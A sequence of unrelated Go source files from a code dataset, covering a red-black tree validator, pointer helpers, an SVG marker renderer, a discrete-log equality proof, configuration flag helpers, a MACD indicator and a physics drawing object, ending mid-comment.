	if x == t.Nil {
		return true
	}
	if x.Color == Red {
		if x.Left.Color != Black || x.Right.Color != Black {
			return false
		}
	}
	return t.validateRedChildren(x.Left) && t.validateRedChildren(x.Right)
}

// verifyTreeBSTProperty reports whether the whole tree satisfies the binary
// search tree ordering over the full key range.
func (t *Tree) verifyTreeBSTProperty() bool {
	return t.verifyBSTProperty(t.Root, minKey, maxKey)
}
func (t *Tree) verifyBSTProperty(p *Node, low, high KeyType) bool {
if p == t.Nil {
return true
}
if p.Key < low || p.Key > high {
return false
}
return t.verifyBSTProperty(p.Left, low, p.Key) &&
t.verifyBSTProperty(p.Right, p.Key + 1, high)
} | Lecture 10- Red-black trees/src/rbt/rbt.go | 0.745769 | 0.550366 | rbt.go | starcoder |
package ext
import (
"reflect"
"time"
)
// IsNil reports whether value is nil: either an untyped nil interface, or a
// typed nil of any nilable kind (pointer, map, slice, channel, func,
// interface) boxed inside the interface. The original only detected nil
// pointers, so e.g. a nil map reported false.
func IsNil(value interface{}) bool {
	if value == nil {
		return true
	}
	v := reflect.ValueOf(value)
	switch v.Kind() {
	case reflect.Ptr, reflect.Map, reflect.Slice, reflect.Chan, reflect.Func, reflect.Interface:
		return v.IsNil()
	}
	return false
}
// IsEmpty reports whether test is nil or points to the empty string.
func IsEmpty(test *string) bool {
	return test == nil || *test == ""
}
// Pointers: each helper returns a pointer to a copy of its argument, useful
// for taking the address of a literal.
func Bool(val bool) *bool {
	return &val
}
// String returns a pointer to a copy of val.
func String(val string) *string {
	return &val
}
// Byte returns a pointer to a copy of val.
func Byte(val byte) *byte {
	return &val
}
// Int returns a pointer to a copy of val.
func Int(val int) *int {
	return &val
}
// Int8 returns a pointer to a copy of val.
func Int8(val int8) *int8 {
	return &val
}
// Int16 returns a pointer to a copy of val.
func Int16(val int16) *int16 {
	return &val
}
// Int32 returns a pointer to a copy of val.
func Int32(val int32) *int32 {
	return &val
}
// Int64 returns a pointer to a copy of val.
func Int64(val int64) *int64 {
	return &val
}
// Float32 returns a pointer to a copy of val.
func Float32(val float32) *float32 {
	return &val
}
// Float64 returns a pointer to a copy of val.
func Float64(val float64) *float64 {
	return &val
}
// Defaults: each helper dereferences its pointer argument, falling back to
// the given default when the pointer is nil.
func DefBool(test *bool, value bool) bool {
	if test != nil {
		return *test
	}
	return value
}
// DefStr returns *test, or value when test is nil.
func DefStr(test *string, value string) string {
	if test != nil {
		return *test
	}
	return value
}
// DefInt64 returns *test, or value when test is nil.
func DefInt64(test *int64, value int64) int64 {
	if test != nil {
		return *test
	}
	return value
}
// DefFloat64 returns *test, or value when test is nil.
func DefFloat64(test *float64, value float64) float64 {
	if test != nil {
		return *test
	}
	return value
}
// DefTime returns *test, or value when test is nil.
func DefTime(test *time.Time, value time.Time) time.Time {
	if test != nil {
		return *test
	}
	return value
}
// DefDate returns *test, or value when test is nil.
func DefDate(test *Date, value Date) Date {
	if test != nil {
		return *test
	}
	return value
}
// Clone: each helper returns a pointer to a fresh copy of the pointed-to
// value, or nil when the input pointer is nil.
func CloneBool(test *bool) *bool {
	if test == nil {
		return nil
	}
	v := *test
	return &v
}
// CloneStr returns a fresh pointer holding *test, or nil when test is nil.
func CloneStr(test *string) *string {
	if test == nil {
		return nil
	}
	v := *test
	return &v
}
// CloneInt64 returns a fresh pointer holding *test, or nil when test is nil.
func CloneInt64(test *int64) *int64 {
	if test == nil {
		return nil
	}
	v := *test
	return &v
}
// CloneFloat64 returns a fresh pointer holding *test, or nil when test is nil.
func CloneFloat64(test *float64) *float64 {
	if test == nil {
		return nil
	}
	v := *test
	return &v
}
// CloneTime returns a fresh pointer holding *test, or nil when test is nil.
func CloneTime(test *time.Time) *time.Time {
	if test == nil {
		return nil
	}
	v := *test
	return &v
}
func CloneDate(test *Date) *Date {
if test == nil {
return nil
} else {
v := *test
return &v
}
} | ext/Tools.go | 0.602763 | 0.42054 | Tools.go | starcoder |
package svg
import (
"github.com/goki/gi/gi"
"github.com/goki/gi/gist"
"github.com/goki/ki/ki"
"github.com/goki/ki/kit"
"github.com/goki/mat32"
)
// Marker represents marker elements that can be drawn along paths (arrow heads, etc)
type Marker struct {
	NodeBase
	RefPos mat32.Vec2 `xml:"{refX,refY}" desc:"reference position to align the vertex position with, specified in ViewBox coordinates"`
	Size mat32.Vec2 `xml:"{markerWidth,markerHeight}" desc:"size of marker to render, in Units units"`
	Units MarkerUnits `xml:"markerUnits" desc:"units to use"`
	ViewBox ViewBox `desc:"viewbox defines the internal coordinate system for the drawing elements within the marker"`
	Orient string `xml:"orient" desc:"orientation of the marker -- either 'auto' or an angle"`
	VertexPos mat32.Vec2 `desc:"current vertex position"`
	VertexAngle float32 `desc:"current vertex angle in radians"`
	StrokeWidth float32 `desc:"current stroke width"`
	XForm mat32.Mat2 `desc:"net transform computed from settings and current values -- applied prior to rendering"`
	EffSize mat32.Vec2 `desc:"effective size for actual rendering"`
}
// KiT_Marker registers the Marker type with the ki type registry.
var KiT_Marker = kit.Types.AddType(&Marker{}, ki.Props{"EnumType:Flag": gi.KiT_NodeFlags})
// AddNewMarker adds a new marker to given parent node, with given name.
func AddNewMarker(parent ki.Ki, name string) *Marker {
	return parent.AddNewChild(KiT_Marker, name).(*Marker)
}
// SVGName returns the SVG element name for this node.
func (g *Marker) SVGName() string { return "marker" }
// EnforceSVGName reports whether the node name must match the SVG name.
func (g *Marker) EnforceSVGName() bool { return false }
// CopyFieldsFrom copies all Marker fields from another Marker.
func (g *Marker) CopyFieldsFrom(frm interface{}) {
	fr := frm.(*Marker)
	g.NodeBase.CopyFieldsFrom(&fr.NodeBase)
	g.RefPos = fr.RefPos
	g.Size = fr.Size
	g.Units = fr.Units
	g.ViewBox = fr.ViewBox
	g.Orient = fr.Orient
	g.VertexPos = fr.VertexPos
	g.VertexAngle = fr.VertexAngle
	g.StrokeWidth = fr.StrokeWidth
	g.XForm = fr.XForm
	g.EffSize = fr.EffSize
}
// MarkerUnits specifies units to use for svg marker elements
type MarkerUnits int32
const (
	// StrokeWidth scales the marker by the current stroke width;
	// UserSpaceOnUse renders it at its specified size.
	StrokeWidth MarkerUnits = iota
	UserSpaceOnUse
	MarkerUnitsN
)
//go:generate stringer -type=MarkerUnits
// KiT_MarkerUnits registers the MarkerUnits enum with the kit enum registry.
var KiT_MarkerUnits = kit.Enums.AddEnumAltLower(MarkerUnitsN, kit.NotBitFlag, gist.StylePropProps, "")
// MarshalJSON / UnmarshalJSON encode the enum via the kit helpers.
func (ev MarkerUnits) MarshalJSON() ([]byte, error) { return kit.EnumMarshalJSON(ev) }
func (ev *MarkerUnits) UnmarshalJSON(b []byte) error { return kit.EnumUnmarshalJSON(ev, b) }
// RenderMarker renders the marker using given vertex position, angle (in
// radians), and stroke width
func (mrk *Marker) RenderMarker(vertexPos mat32.Vec2, vertexAng, strokeWidth float32) {
	mrk.VertexPos = vertexPos
	mrk.VertexAngle = vertexAng
	mrk.StrokeWidth = strokeWidth
	// Scale by the stroke width only when the marker is in stroke units.
	if mrk.Units == StrokeWidth {
		mrk.EffSize = mrk.Size.MulScalar(strokeWidth)
	} else {
		mrk.EffSize = mrk.Size
	}
	ang := vertexAng
	if mrk.Orient != "auto" {
		// Fixed orientation: parse the angle from the attribute instead.
		ang, _ = mat32.ParseAngle32(mrk.Orient)
	}
	if mrk.ViewBox.Size.IsNil() {
		// NOTE(review): 3x3 is presumably a conventional default viewbox
		// size -- confirm against the SVG marker spec usage elsewhere.
		mrk.ViewBox.Size = mat32.Vec2{3, 3}
	}
	// Rotate, scale viewbox units to effective size, then shift by the
	// reference point; finally translate to the vertex position.
	mrk.XForm = mat32.Rotate2D(ang).Scale(mrk.EffSize.X/mrk.ViewBox.Size.X, mrk.EffSize.Y/mrk.ViewBox.Size.Y).Translate(-mrk.RefPos.X, -mrk.RefPos.Y)
	mrk.XForm.X0 += vertexPos.X
	mrk.XForm.Y0 += vertexPos.Y
	mrk.Pnt.XForm = mrk.XForm
	mrk.Render2D()
}
func (g *Marker) Render2D() {
if g.Viewport == nil {
g.This().(gi.Node2D).Init2D()
}
pc := &g.Pnt
rs := g.Render()
if rs == nil {
return
}
rs.PushXFormLock(pc.XForm)
g.Render2DChildren()
g.ComputeBBoxSVG() // must come after render
rs.PopXFormLock()
} | svg/marker.go | 0.764364 | 0.429968 | marker.go | starcoder |
package dlogproofs
import (
"math/big"
"github.com/xlab-si/emmy/crypto/common"
"github.com/xlab-si/emmy/crypto/groups"
)
// Transcript is a blinded proof transcript: the two commitments A and B, the
// hash of the commitments, and the masked response z+alpha.
type Transcript struct {
	A      *big.Int
	B      *big.Int
	Hash   *big.Int
	ZAlpha *big.Int
}

// NewTranscript bundles the given values into a Transcript.
func NewTranscript(a, b, hash, zAlpha *big.Int) *Transcript {
	return &Transcript{A: a, B: b, Hash: hash, ZAlpha: zAlpha}
}
// VerifyBlindedTranscript checks that a blinded transcript is valid: it
// proves knowledge of log_g1(t1), log_G2(T2) and that the two logs are
// equal, where G2 = g2^gamma and T2 = t2^gamma for a verifier-chosen gamma.
func VerifyBlindedTranscript(transcript *Transcript, group *groups.SchnorrGroup, g1, t1, G2, T2 *big.Int) bool {
	// Transcript is [alpha1, beta1, hash(alpha1, beta1), z+alpha];
	// first recompute and compare the hash commitment.
	if common.Hash(transcript.A, transcript.B).Cmp(transcript.Hash) != 0 {
		return false
	}
	// With c-beta = hash(alpha1, beta1), verify:
	//   g1^(z+alpha) = alpha1 * t1^(c-beta)
	//   G2^(z+alpha) = beta1  * T2^(c-beta)
	lhs1 := group.Exp(g1, transcript.ZAlpha)
	rhs1 := group.Mul(transcript.A, group.Exp(t1, transcript.Hash))
	lhs2 := group.Exp(G2, transcript.ZAlpha)
	rhs2 := group.Mul(transcript.B, group.Exp(T2, transcript.Hash))
	return lhs1.Cmp(rhs1) == 0 && lhs2.Cmp(rhs2) == 0
}
// DLogEqualityBTranscriptProver proves knowledge of a discrete log that is
// equal under two generators, producing data a verifier can turn into a
// blinded transcript.
type DLogEqualityBTranscriptProver struct {
	Group *groups.SchnorrGroup
	r *big.Int
	secret *big.Int
	g1 *big.Int
	g2 *big.Int
}
// NewDLogEqualityBTranscriptProver returns a prover operating in the given group.
func NewDLogEqualityBTranscriptProver(group *groups.SchnorrGroup) *DLogEqualityBTranscriptProver {
	prover := DLogEqualityBTranscriptProver{
		Group: group,
	}
	return &prover
}
// Prove that you know dlog_g1(h1), dlog_g2(h2) and that dlog_g1(h1) = dlog_g2(h2).
// GetProofRandomData stores the secret and generators, picks a random
// exponent r, and returns the commitments g1^r and g2^r.
func (prover *DLogEqualityBTranscriptProver) GetProofRandomData(secret, g1, g2 *big.Int) (*big.Int,
	*big.Int) {
	// Set the values that are needed before the protocol can be run.
	// The protocol proves the knowledge of log_g1(t1), log_g2(t2) and
	// that log_g1(t1) = log_g2(t2).
	prover.secret = secret
	prover.g1 = g1
	prover.g2 = g2
	r := common.GetRandomInt(prover.Group.Q)
	prover.r = r
	x1 := prover.Group.Exp(prover.g1, r)
	x2 := prover.Group.Exp(prover.g2, r)
	return x1, x2
}
// GetProofData returns the response z = r + challenge*secret mod q.
func (prover *DLogEqualityBTranscriptProver) GetProofData(challenge *big.Int) *big.Int {
	// z = r + challenge * secret
	z := new(big.Int)
	z.Mul(challenge, prover.secret)
	z.Add(z, prover.r)
	z.Mod(z, prover.Group.Q)
	return z
}
// DLogEqualityBTranscriptVerifier verifies a dlog-equality proof while
// building a blinded transcript using its secret blinding values gamma,
// alpha and beta.
type DLogEqualityBTranscriptVerifier struct {
	Group *groups.SchnorrGroup
	gamma *big.Int
	challenge *big.Int
	g1 *big.Int
	g2 *big.Int
	x1 *big.Int
	x2 *big.Int
	t1 *big.Int
	t2 *big.Int
	alpha *big.Int
	transcript *Transcript
}
// NewDLogEqualityBTranscriptVerifier returns a verifier for the given group.
// When gamma is nil a random blinding exponent is chosen.
func NewDLogEqualityBTranscriptVerifier(group *groups.SchnorrGroup,
	gamma *big.Int) *DLogEqualityBTranscriptVerifier {
	if gamma == nil {
		gamma = common.GetRandomInt(group.Q)
	}
	verifier := DLogEqualityBTranscriptVerifier{
		Group: group,
		gamma: gamma,
	}
	return &verifier
}
// GetChallenge stores the prover's public values and commitments, picks the
// blinding exponents alpha and beta, records the partial blinded transcript
// [alpha1, beta1, hash(alpha1, beta1)], and returns the blinded challenge
// c = hash(alpha1, beta1) + beta mod q.
func (verifier *DLogEqualityBTranscriptVerifier) GetChallenge(g1, g2, t1, t2, x1, x2 *big.Int) *big.Int {
	// Set the values that are needed before the protocol can be run.
	// The protocol proves the knowledge of log_g1(t1), log_g2(t2) and
	// that log_g1(t1) = log_g2(t2).
	verifier.g1 = g1
	verifier.g2 = g2
	verifier.t1 = t1
	verifier.t2 = t2
	// Set the values g1^r1 and g2^r2.
	verifier.x1 = x1
	verifier.x2 = x2
	alpha := common.GetRandomInt(verifier.Group.Q)
	beta := common.GetRandomInt(verifier.Group.Q)
	// alpha1 = g1^r * g1^alpha * t1^beta
	// beta1 = (g2^r * g2^alpha * t2^beta)^gamma
	alpha1 := verifier.Group.Exp(verifier.g1, alpha)
	alpha1 = verifier.Group.Mul(verifier.x1, alpha1)
	tmp := verifier.Group.Exp(verifier.t1, beta)
	alpha1 = verifier.Group.Mul(alpha1, tmp)
	beta1 := verifier.Group.Exp(verifier.g2, alpha)
	beta1 = verifier.Group.Mul(verifier.x2, beta1)
	tmp = verifier.Group.Exp(verifier.t2, beta)
	beta1 = verifier.Group.Mul(beta1, tmp)
	beta1 = verifier.Group.Exp(beta1, verifier.gamma)
	// c = hash(alpha1, beta) + beta mod q
	hashNum := common.Hash(alpha1, beta1)
	challenge := new(big.Int).Add(hashNum, beta)
	challenge.Mod(challenge, verifier.Group.Q)
	verifier.challenge = challenge
	verifier.transcript = NewTranscript(alpha1, beta1, hashNum, nil)
	verifier.alpha = alpha
	return challenge
}
// It receives z = r + secret * challenge.
//It returns true if g1^z = g1^r * (g1^secret) ^ challenge and g2^z = g2^r * (g2^secret) ^ challenge.
func (verifier *DLogEqualityBTranscriptVerifier) Verify(z *big.Int) (bool, *Transcript,
*big.Int, *big.Int) {
left1 := verifier.Group.Exp(verifier.g1, z)
left2 := verifier.Group.Exp(verifier.g2, z)
r11 := verifier.Group.Exp(verifier.t1, verifier.challenge)
r12 := verifier.Group.Exp(verifier.t2, verifier.challenge)
right1 := verifier.Group.Mul(r11, verifier.x1)
right2 := verifier.Group.Mul(r12, verifier.x2)
// transcript [(alpha1, beta1), hash(alpha1, beta1), z+alpha]
// however, we are actually returning [alpha1, beta1, hash(alpha1, beta1), z+alpha]
z1 := new(big.Int).Add(z, verifier.alpha)
verifier.transcript.ZAlpha = z1
G2 := verifier.Group.Exp(verifier.g2, verifier.gamma)
T2 := verifier.Group.Exp(verifier.t2, verifier.gamma)
if left1.Cmp(right1) == 0 && left2.Cmp(right2) == 0 {
return true, verifier.transcript, G2, T2
} else {
return false, nil, nil, nil
}
} | crypto/zkp/primitives/dlogproofs/dlog_equality_blinded_transcript.go | 0.654122 | 0.430806 | dlog_equality_blinded_transcript.go | starcoder |
package conf
import "time"
// DurationVar defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag and/or environment variable.
func (c *Configurator) DurationVar(p *time.Duration, name string, value time.Duration, usage string) {
	// Both sources write through the same pointer.
	c.env().DurationVar(p, name, value, usage)
	c.flag().DurationVar(p, name, value, usage)
}
// Duration defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag and/or environment variable.
func (c *Configurator) Duration(name string, value time.Duration, usage string) *time.Duration {
	p := new(time.Duration)
	c.DurationVar(p, name, value, usage)
	return p
}
// DurationVarE defines a time.Duration environment variable (only) with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the environment variable.
func (c *Configurator) DurationVarE(p *time.Duration, name string, value time.Duration, usage string) {
	c.env().DurationVar(p, name, value, usage)
}
// DurationE defines a time.Duration environment variable (only) with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the environment variable.
func (c *Configurator) DurationE(name string, value time.Duration, usage string) *time.Duration {
	p := new(time.Duration)
	c.DurationVarE(p, name, value, usage)
	return p
}
// DurationVarF defines a time.Duration flag (only) with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag.
func (c *Configurator) DurationVarF(p *time.Duration, name string, value time.Duration, usage string) {
	c.flag().DurationVar(p, name, value, usage)
}
// DurationF defines a time.Duration flag (only) with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag.
func (c *Configurator) DurationF(name string, value time.Duration, usage string) *time.Duration {
	p := new(time.Duration)
	c.DurationVarF(p, name, value, usage)
	return p
}
// DurationVar defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag and/or environment variable.
func DurationVar(p *time.Duration, name string, value time.Duration, usage string) {
Global.DurationVar(p, name, value, usage)
}
// Duration defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag and/or environment variable.
// It operates on the package-level Global configurator.
func Duration(name string, value time.Duration, usage string) *time.Duration {
	return Global.Duration(name, value, usage)
}
// DurationVarE defines a time.Duration environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the environment variable.
// It operates on the package-level Global configurator.
func DurationVarE(p *time.Duration, name string, value time.Duration, usage string) {
	Global.DurationVarE(p, name, value, usage)
}
// DurationE defines a time.Duration environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the environment variable.
// It operates on the package-level Global configurator.
func DurationE(name string, value time.Duration, usage string) *time.Duration {
	return Global.DurationE(name, value, usage)
}
// DurationVarF defines a time.Duration flag with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag.
// It operates on the package-level Global configurator.
func DurationVarF(p *time.Duration, name string, value time.Duration, usage string) {
	Global.DurationVarF(p, name, value, usage)
}
// DurationF defines a time.Duration flag with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag.
// It operates on the package-level Global configurator.
func DurationF(name string, value time.Duration, usage string) *time.Duration {
	return Global.DurationF(name, value, usage)
}
package indicators
import (
"errors"
"github.com/jaybutera/gotrade"
)
// A Moving Average Convergence-Divergence (Macd) Indicator
type Macd struct {
	*baseIndicator
	*baseFloatBounds
	// private variables
	valueAvailableAction ValueAvailableActionMacd        // invoked once per computed (macd, signal, histogram) triple
	fastTimePeriod       int                             // period of the fast EMA
	slowTimePeriod       int                             // period of the slow EMA
	signalTimePeriod     int                             // period of the signal-line EMA
	emaFast              *EmaWithoutStorage              // fast EMA of the selected price
	emaSlow              *EmaWithoutStorage              // slow EMA of the selected price
	emaSignal            *EmaWithoutStorage              // EMA of the MACD line itself
	currentFastEma       float64                         // latest fast EMA value
	currentSlowEma       float64                         // latest slow EMA value
	currentMacd          float64                         // latest MACD (fast - slow)
	emaSlowSkip          int                             // bars to skip so fast/slow EMAs align (slow - fast)
	selectData           gotrade.DOHLCVDataSelectionFunc // extracts the price to use from each DOHLCV tick
	// public variables
	Macd      []float64
	Signal    []float64
	Histogram []float64
}
// NewMacd creates a Moving Average Convergence Divergence Indicator (Macd) for online usage.
// fastTimePeriod and slowTimePeriod must be in [2, MaximumLookbackPeriod],
// signalTimePeriod in [1, MaximumLookbackPeriod], and selectData must be non-nil.
func NewMacd(fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
	// the minimum fastTimePeriod for this indicator is 2
	if fastTimePeriod < 2 {
		return nil, errors.New("fastTimePeriod is less than the minimum (2)")
	}
	// check the maximum fastTimePeriod
	if fastTimePeriod > MaximumLookbackPeriod {
		return nil, errors.New("fastTimePeriod is greater than the maximum (100000)")
	}
	// the minimum slowTimePeriod for this indicator is 2
	if slowTimePeriod < 2 {
		return nil, errors.New("slowTimePeriod is less than the minimum (2)")
	}
	// check the maximum slowTimePeriod
	if slowTimePeriod > MaximumLookbackPeriod {
		return nil, errors.New("slowTimePeriod is greater than the maximum (100000)")
	}
	// the minimum signalTimePeriod for this indicator is 1
	if signalTimePeriod < 1 {
		return nil, errors.New("signalTimePeriod is less than the minimum (1)")
	}
	// check the maximum signalTimePeriod
	if signalTimePeriod > MaximumLookbackPeriod {
		return nil, errors.New("signalTimePeriod is greater than the maximum (100000)")
	}
	if selectData == nil {
		return nil, ErrDOHLCVDataSelectFuncIsNil
	}
	lookback := slowTimePeriod + signalTimePeriod - 2
	ind := Macd{
		baseIndicator:    newBaseIndicator(lookback),
		baseFloatBounds:  newBaseFloatBounds(),
		fastTimePeriod:   fastTimePeriod,
		slowTimePeriod:   slowTimePeriod,
		signalTimePeriod: signalTimePeriod,
	}
	// shift the fast ema up so that it has valid data at the same time as the slow emas
	ind.emaSlowSkip = slowTimePeriod - fastTimePeriod
	// Bug fix: each constructor error is now checked immediately; previously
	// err was silently overwritten, so a failure creating an earlier EMA
	// could be masked by a later success.
	ind.emaFast, err = NewEmaWithoutStorage(fastTimePeriod, func(dataItem float64, streamBarIndex int) {
		ind.currentFastEma = dataItem
	})
	if err != nil {
		return nil, err
	}
	ind.emaSlow, err = NewEmaWithoutStorage(slowTimePeriod, func(dataItem float64, streamBarIndex int) {
		ind.currentSlowEma = dataItem
		ind.currentMacd = ind.currentFastEma - ind.currentSlowEma
		ind.emaSignal.ReceiveTick(ind.currentMacd, streamBarIndex)
	})
	if err != nil {
		return nil, err
	}
	ind.emaSignal, err = NewEmaWithoutStorage(signalTimePeriod, func(dataItem float64, streamBarIndex int) {
		// Macd Line: (12-day EmaWithoutStorage - 26-day EmaWithoutStorage)
		// Signal Line: 9-day EmaWithoutStorage of Macd Line
		// Macd Histogram: Macd Line - Signal Line
		macd := ind.currentFastEma - ind.currentSlowEma
		signal := dataItem
		histogram := macd - signal
		ind.UpdateMinMax(macd, macd)
		ind.UpdateMinMax(signal, signal)
		ind.UpdateMinMax(histogram, histogram)
		ind.IncDataLength()
		ind.SetValidFromBar(streamBarIndex)
		// notify of a new result value though the value available action
		ind.valueAvailableAction(macd, signal, histogram, streamBarIndex)
	})
	if err != nil {
		return nil, err
	}
	ind.selectData = selectData
	// default action: accumulate results into the public result slices
	ind.valueAvailableAction = func(dataItemMacd float64, dataItemSignal float64, dataItemHistogram float64, streamBarIndex int) {
		ind.Macd = append(ind.Macd, dataItemMacd)
		ind.Signal = append(ind.Signal, dataItemSignal)
		ind.Histogram = append(ind.Histogram, dataItemHistogram)
	}
	return &ind, nil
}
// NewDefaultMacd creates a Moving Average Convergence Divergence Indicator (Macd)
// for online usage with the standard default parameters:
//	fastTimePeriod   - 12
//	slowTimePeriod   - 26
//	signalTimePeriod - 9
func NewDefaultMacd() (indicator *Macd, err error) {
	const (
		defaultFast   = 12
		defaultSlow   = 26
		defaultSignal = 9
	)
	return NewMacd(defaultFast, defaultSlow, defaultSignal, gotrade.UseClosePrice)
}
// NewMacdWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd)
// for offline usage. sourceLength is the expected number of source bars and is
// used to pre-allocate the result slices.
func NewMacdWithSrcLen(sourceLength uint, fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
	ind, err := NewMacd(fastTimePeriod, slowTimePeriod, signalTimePeriod, selectData)
	if err != nil {
		// Bug fix: the error was previously ignored, leading to a nil
		// dereference on ind below.
		return nil, err
	}
	// only initialise the storage if there is enough source data to require it.
	// Bug fix: the comparison is rearranged so the unsigned subtraction cannot
	// underflow when sourceLength <= lookback (previously this produced an
	// enormous capacity and allocation).
	lookback := uint(ind.GetLookbackPeriod())
	if sourceLength > lookback+1 {
		capacity := sourceLength - lookback
		ind.Macd = make([]float64, 0, capacity)
		ind.Signal = make([]float64, 0, capacity)
		ind.Histogram = make([]float64, 0, capacity)
	}
	return ind, nil
}
// NewDefaultMacdWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd)
// for offline usage with default parameters (12/26/9), pre-allocating result
// storage for sourceLength bars.
func NewDefaultMacdWithSrcLen(sourceLength uint) (indicator *Macd, err error) {
	ind, err := NewDefaultMacd()
	if err != nil {
		// Bug fix: the error was previously ignored, leading to a nil
		// dereference on ind below.
		return nil, err
	}
	// only initialise the storage if there is enough source data to require it.
	// Bug fix: rearranged to avoid unsigned underflow when
	// sourceLength <= lookback.
	lookback := uint(ind.GetLookbackPeriod())
	if sourceLength > lookback+1 {
		capacity := sourceLength - lookback
		ind.Macd = make([]float64, 0, capacity)
		ind.Signal = make([]float64, 0, capacity)
		ind.Histogram = make([]float64, 0, capacity)
	}
	return ind, nil
}
// NewMacdForStream creates a Moving Average Convergence Divergence Indicator (Macd)
// for online usage and subscribes it to the provided source data stream.
func NewMacdForStream(priceStream gotrade.DOHLCVStreamSubscriber, fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
	ind, err := NewMacd(fastTimePeriod, slowTimePeriod, signalTimePeriod, selectData)
	if err != nil {
		// Bug fix: don't subscribe a nil indicator to the stream on error.
		return nil, err
	}
	priceStream.AddTickSubscription(ind)
	return ind, nil
}
// NewDefaultMacdForStream creates a Moving Average Convergence Divergence Indicator (Macd)
// with default parameters (12/26/9) and subscribes it to the provided source data stream.
func NewDefaultMacdForStream(priceStream gotrade.DOHLCVStreamSubscriber) (indicator *Macd, err error) {
	ind, err := NewDefaultMacd()
	if err != nil {
		// Bug fix: don't subscribe a nil indicator to the stream on error.
		return nil, err
	}
	priceStream.AddTickSubscription(ind)
	return ind, nil
}
// NewMacdForStreamWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd)
// for offline usage, pre-allocating storage for sourceLength bars, and
// subscribes it to the provided source data stream.
func NewMacdForStreamWithSrcLen(sourceLength uint, priceStream gotrade.DOHLCVStreamSubscriber, fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
	ind, err := NewMacdWithSrcLen(sourceLength, fastTimePeriod, slowTimePeriod, signalTimePeriod, selectData)
	if err != nil {
		// Bug fix: don't subscribe a nil indicator to the stream on error.
		return nil, err
	}
	priceStream.AddTickSubscription(ind)
	return ind, nil
}
// NewDefaultMacdForStreamWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd)
// for offline usage with default parameters (12/26/9), pre-allocating storage
// for sourceLength bars, and subscribes it to the provided source data stream.
func NewDefaultMacdForStreamWithSrcLen(sourceLength uint, priceStream gotrade.DOHLCVStreamSubscriber) (indicator *Macd, err error) {
	ind, err := NewDefaultMacdWithSrcLen(sourceLength)
	if err != nil {
		// Bug fix: don't subscribe a nil indicator to the stream on error.
		return nil, err
	}
	priceStream.AddTickSubscription(ind)
	return ind, nil
}
// ReceiveDOHLCVTick consumes a source data DOHLCV price tick, extracting the
// configured price component and forwarding it to ReceiveTick.
func (ind *Macd) ReceiveDOHLCVTick(tickData gotrade.DOHLCV, streamBarIndex int) {
	ind.ReceiveTick(ind.selectData(tickData), streamBarIndex)
}
// ReceiveTick consumes one selected price value. The fast EMA is only fed
// once streamBarIndex has passed emaSlowSkip, so that the fast and slow EMAs
// produce their first valid values on the same bar; the slow EMA receives
// every tick.
func (ind *Macd) ReceiveTick(tickData float64, streamBarIndex int) {
	if streamBarIndex > ind.emaSlowSkip {
		ind.emaFast.ReceiveTick(tickData, streamBarIndex)
	}
	ind.emaSlow.ReceiveTick(tickData, streamBarIndex)
}
package pixelmunk
import (
"fmt"
"github.com/faiface/pixel"
"github.com/faiface/pixel/imdraw"
"github.com/vova616/chipmunk"
"golang.org/x/image/colornames"
"math"
)
// Compile-time assertion that *Object satisfies the Drawable interface.
var _ Drawable = &Object{}
// NewObject creates a new Object for the provided Body and ObjectOptions.
// The body is used as-is; no shapes or body options are applied here.
func NewObject(body *chipmunk.Body, options ObjectOptions) Object {
	return Object{
		body:    body,
		options: options,
	}
}
// NewObjectWithShape creates a new Object for the provided Shape and ObjectOptions.
// The shape's elasticity and friction are taken from the options, a static or
// dynamic body is created around it, and position/velocity/angle are applied.
func NewObjectWithShape(shape *chipmunk.Shape, options ObjectOptions) Object {
	shape.SetElasticity(options.BodyOptions.Elasticity)
	shape.SetFriction(options.BodyOptions.Friction)
	var body *chipmunk.Body
	if options.BodyOptions.StaticBody {
		body = chipmunk.NewBodyStatic()
	} else {
		// the moment of inertia is derived from the shape and configured mass
		body = chipmunk.NewBody(options.BodyOptions.Mass, shape.Moment(float32(options.BodyOptions.Mass)))
	}
	body.AddShape(shape)
	body.SetPosition(options.BodyOptions.Position)
	body.SetVelocity(float32(options.BodyOptions.Velocity.X), float32(options.BodyOptions.Velocity.Y))
	body.SetAngle(options.BodyOptions.Angle)
	return Object{
		body:    body,
		options: options,
	}
}
// GetBody returns the chipmunk.Body that the Object represents.
func (o Object) GetBody() *chipmunk.Body {
	return o.body
}
// GetOptions returns the ObjectOptions that were used to create the Object.
func (o Object) GetOptions() ObjectOptions {
	return o.options
}
// Draw draws the Object on the provided imdraw.IMDraw. Only circle and box
// shapes are supported; any other shape type panics.
func (o Object) Draw(imd *imdraw.IMDraw) {
	for _, shape := range o.GetBody().Shapes {
		switch shape.ShapeType() {
		case chipmunk.ShapeType_Circle:
			o.drawCircle(imd, shape)
		case chipmunk.ShapeType_Box:
			o.drawBox(imd, shape)
		default:
			panic(fmt.Sprintf("unsupported shape type: %d", shape.ShapeType()))
		}
		// NOTE(review): the custom draw funcs run inside the shape loop, so an
		// object with several shapes invokes each CustomDrawFunc once per
